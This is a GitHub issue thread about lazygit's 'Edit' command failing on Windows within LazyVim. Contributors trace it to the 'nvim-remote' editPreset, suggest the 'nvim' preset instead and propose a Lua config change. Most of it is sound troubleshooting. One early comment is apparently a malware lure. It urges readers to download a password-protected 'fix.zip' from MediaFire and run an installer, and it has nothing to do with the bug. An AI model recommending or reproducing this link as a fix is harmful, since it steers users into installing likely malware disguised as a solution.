### ISSUE TITLE
bug: Lazygit integration windows' "Edit" command doesn't work ?

### ISSUE THREAD

**Issue by avario-cpu** [LazyVim/LazyVim#4364]
### Did you check docs and existing issues?

- [X] I have read all the LazyVim docs
- [X] I have updated the plugin to the latest version before submitting this issue
- [X] I have searched the existing issues of LazyVim
- [X] I have searched the existing issues of plugins related to this issue

### Neovim version (nvim -v)

0.10.1

### Operating system/version

Windows

### Describe the bug

https://github.com/user-attachments/assets/20d4d762-790d-4dc4-8921-21534a323493
1. First case demonstrates lazygit working as intented, opening nvim (default git editor) from the terminal  to edit my file.
2. Second case is an attempt for the same usage from the integration within nvim, expecting maybe for the floating window to be closed, and a buffer to be open ?

Not sure if it's a bug or just the way it is supposed to be ? 

Note: I am using lazygit integrated version, as in, from the distro, so there is no "lazygit" plugin installed or configured aside from that.

The version used from terminal is from a binary release.

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dpetka2001** [comment]
LazyVim sets 
```yml
os:
  editPreset: "nvim-remote"
```
which seems to be what's causing the problem. But that is a lazygit preset. If you put in your `$APPDATA/Local/lazygit/config.yml` the above preset you will notice the same behavior. On Linux it works correctly, but not on Windows now that I tested. 

This is not a LazyVim bug and you should create an issue at lazygit github repo if you want it resolved.

It prints this as an error
```shell
+ cmd /c [ -z $NVIM ] ^&^& (nvim -- C:\Users\jrn23\AppData\Local\test\test.lua) ^|^| (nvim --server $NVIM --remote-send q ^&^& nvim --server $NVIM --remote-tab C:\Users\jrn23\AppData\Local\test\test.lua)
```
It seems that it does some kind of test to see if it's inside Neovim and that fails.

**Comment by iamxiaojianzheng** [comment]
Try `editPreset: "nvim"`, this works for me.

**Comment by avario-cpu** [comment]
> Try `editPreset: "nvim"`, this works for me.
> 
>  Video_2024-08-28_170231.mp4

Ty. Can confirm that it works for me too.

For other begginners like who would struggle finding this line, it's gonna be in:
https://github.com/LazyVim/LazyVim/blob/12818a6cb499456f4903c5d8e68af43753ebc869/lua/lazyvim/util/lazygit.lua#L124

(So in nvimdata folder in Windows, not in nvim where most of the configuration would normally be done.)

I was struggling, trying to get my own config.yaml but getting it overriden by LazyVim, without finding an actual equivalent config.yaml file in the distro repo ... confused.

**Comment by dpetka2001** [comment]
> I was struggling, trying to get my own config.yaml but getting it overriden by LazyVim, without finding an actual equivalent config.yaml file in the distro repo ... confused.

Yes, this happens because LazyVim uses `LG_CONFIG_FILE` lazygit environment variable to merge the user's personal config and the `lazygit-theme.yml`. But when the merge happens, if there are same values in both files then the right-most file will overwrite the values of the left-most file (which is the user's personal `config.yml` in this case). We could make it so that an additional file in `~/.config/lazygit/` directory is taken into account **if it exists**, so that users can overwrite the LazyVim values more intuitively? 

So, we could change the following lines https://github.com/LazyVim/LazyVim/blob/12818a6cb499456f4903c5d8e68af43753ebc869/lua/lazyvim/util/lazygit.lua#L70-L72

to something like 
```lua
      if ok then
        M.config_dir = lines[1]
        vim.env.LG_CONFIG_FILE = LazyVim.norm(M.config_dir .. "/config.yml" .. "," .. M.theme_path)
        local custom_config = LazyVim.norm(M.config_dir .. "/custom.yml")
        if vim.uv.fs_stat(custom_config) and vim.uv.fs_stat(custom_config).type == "file" then
          vim.env.LG_CONFIG_FILE = vim.env.LG_CONFIG_FILE .. "," .. custom_config
        end
```
The user then could put the values he wants to overwrite in `~/.config/lazygit/custom.yml` and that would take precedence compared to the default LazyVim values. Would that be acceptable as an easier means for the user? I'm willing to make a PR about this and it's up to the maintainer to accept it or not. 

I think this is more intuitive also if the user wants to backup the lazygit directory instead of also having to backup `~/.cache/nvim/lazygit-theme.yml` in my personal opinion, but this is just a personal preference and don't know how other people feel about it.

Still the more correct solution would be for the issue to be resolved in the lazygit github repo for Windows specifically, since it seems to be working just fine on Linux.

**Comment by avario-cpu** [comment]
A simple "There is an option called `nvim-remote` which is experimental (says so on the LG repo) [and might not work on Windows right now](https://github.com/jesseduffield/lazygit/issues/3467)" You might need to set it to "nvim" to use the floatTerm lazygit, would be plenty. Looking up LazyVim docs I don't see that mentionned anywhere AFAIK.

Beyond that I cannot really say anything I'm just way too clueless as of now lol.

**Comment by dpetka2001** [comment]
In LazyVim docs it's mentioned in the [General options](https://www.lazyvim.org/configuration/general#options) and you can see that it's mentioned what it's setting
> -- LazyVim automatically configures lazygit:
--  * theme, based on the active colorscheme.
--  * editorPreset to nvim-remote
--  * enables nerd font icons
-- Set to false to disable.
vim.g.lazygit_config = true

As for the experimental part and might not work on Windows, not everyone uses Windows daily, so some things are expected to slip by. I, for once, don't use Windows and don't do any testing in a Windows environment. Whatever I contribute is just tested on Linux. I can't speak for the maintainer himself. I remember him mentioning that he also tests on Windows, but this specific detail might have just slipped him. 

That's why users bring up topics that might not have caught the eye of the contributors here and an effort is made to accommodate those if something in LazyVim is at fault.

**Comment by dpetka2001** [comment]
@avario-cpu I made the PR. Also, added your suggestion about `nvim-remote` on Windows with the issue that you linked in `options.lua` file, so that it will also appear on the LazyVim docs.

**Comment by avario-cpu** [comment]
One unwanted consequence of having to manually set the value inside the nvimdata folder for the editPreset will also be:
![image](https://github.com/user-attachments/assets/e29a0289-efe4-4eef-91b5-3032617cdba3)

**Comment by dpetka2001** [comment]
Yes, you don't make changes in `data` folder. Only in your personal configuration, but currently LazyVim does not provide such a way for lazygit (it's just hardcoded in the code). But this has nothing to do with this issue. Like I said before this is not a LazyVim bug. Even if the maintainer doesn't accept my PR (which was made purely for user's better experience) this is a problem with lazygit and how `nvim-remote` behaves on Windows.
